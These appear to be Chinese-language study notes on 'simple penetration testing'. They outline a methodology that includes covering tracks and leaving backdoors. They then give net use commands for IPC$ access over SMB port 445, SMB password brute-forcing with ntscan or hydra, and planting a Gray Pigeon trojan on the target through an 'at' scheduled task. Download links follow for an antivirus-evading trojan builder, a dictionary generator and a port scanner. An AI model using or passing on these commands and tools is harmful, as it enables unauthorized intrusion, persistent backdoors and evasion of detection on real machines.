day 09 简单渗透测试
目录
简单渗透测试思路
0.授权
1.信息收集
- nslookup 域名 查IP
- nslookup whois 查子域名
2.扫描漏洞
-
nmap(扫描软件) scanport(端口扫描)
且利用 telnet 命令也可以探测:telnet IP 端口号,若标题变成 telnet 则说明开放
-
首先基础扫描 IP 范围 端口
-
然后再根据端口深入扫描 (IIS,apache,什么网站)
-
高级扫描:
扫描容器漏洞:如 IIS 漏洞 2003-IIS6.0 或 2008-IIS7.0 版本的
扫描网站漏洞(SQL 等)
3.漏洞利用
4.提权(shell环境、桌面环境 == 最高权限)
5.毁尸灭迹
6.留后门
7.渗透测试报告
简单渗透测试过程
1.445漏洞之 IPC$
net use f: \\10.1.1.2\share 密码 /user:用户 == 把分享文件映射到自己电脑
net use f: /del
net use * /del
net use \\10.1.1.2\IPC$ 密码 /user:用户 == IPC漏洞
2.暴力破解系统密码之445
- 软件:ntscan1.0 //也可用 hydra
- 用字典编写软件编写个字典
3.创建后门
- 用灰鸽子制作木马
- copy 植入木马
- net time \\10.1.1.2 查看目标当前时间
- at \\10.1.1.2 11:11 “c:\windows\system32\heihei.exe” 创建一个计划任务,在11:11时运行exe文件
相关软件下载
真空密码字典生成器: https://wwa.lanzous.com/ibl5ywd
鸽子牧民战天免杀专版0912: https://wwa.lanzous.com/ibl5y7i
内网端口扫描ScanPort: https://wwa.lanzous.com/ibl5y1c
